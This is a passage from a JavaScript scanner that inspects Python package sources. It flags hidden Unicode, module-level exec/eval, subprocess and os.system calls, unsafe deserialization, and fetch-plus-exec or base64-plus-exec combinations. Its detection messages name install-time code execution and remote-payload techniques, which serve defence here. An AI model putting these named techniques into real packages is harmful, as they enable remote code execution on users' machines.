        `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`
      );
    }

    // Clean the text: invisibles out first, then docstrings, then comments.
    const visibleText = invisibleCount > 0 ? stripInvisibleUnicode(source) : source;
    const cleaned = stripPythonComments(stripTripleQuotedStrings(visibleText));

    const hasExec = detectImportTimeExec(cleaned);
    const hasSubprocess = detectImportTimeSubprocess(cleaned);
    const hasOsSystem = detectImportTimeOsSystem(cleaned);
    const hasFetch = detectNetworkFetch(cleaned);
    const hasBase64 = detectBase64Decode(cleaned);
    const hasDeser = detectDeserialization(cleaned);
    const hasDynImport = detectDynamicDangerousImport(cleaned);

    // [triggered, type, severity, message]: single-signal findings first,
    // then the compound ones, which fire in addition to the individual hits.
    const verdicts = [
      [
        hasExec,
        'import_time_exec',
        'CRITICAL',
        `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`
      ],
      [
        hasSubprocess,
        'import_time_subprocess',
        'CRITICAL',
        `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`
      ],
      [
        hasOsSystem,
        'import_time_os_system',
        'CRITICAL',
        `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`
      ],
      [
        hasDeser,
        'import_time_deserialization',
        'CRITICAL',
        `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`
      ],
      [
        hasDynImport,
        'dynamic_dangerous_import',
        'HIGH',
        `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`
      ],
      [
        hasFetch && hasExec,
        'import_time_fetch_exec',
        'CRITICAL',
        `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`
      ],
      [
        hasBase64 && hasExec,
        'import_time_base64_exec',
        'CRITICAL',
        `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`
      ]
    ];

    for (const [triggered, type, severity, message] of verdicts) {
      if (triggered) report(type, severity, message);
    }
  }

  return findings;
}
|
|
303
|
+
|
|
304
|
+
module.exports = {
|
|
305
|
+
scanPythonSource,
|
|
306
|
+
// Exported for unit testing of the helpers in isolation.
|
|
307
|
+
_internal: {
|
|
308
|
+
findTargetPythonFiles,
|
|
309
|
+
stripPythonComments,
|
|
310
|
+
stripTripleQuotedStrings,
|
|
311
|
+
detectImportTimeExec,
|
|
312
|
+
detectImportTimeSubprocess,
|
|
313
|
+
detectImportTimeOsSystem,
|
|
314
|
+
detectNetworkFetch,
|
|
315
|
+
detectBase64Decode,
|
|
316
|
+
detectDeserialization,
|
|
317
|
+
detectDynamicDangerousImport
|
|
318
|
+
}
|
|
319
|
+
};
|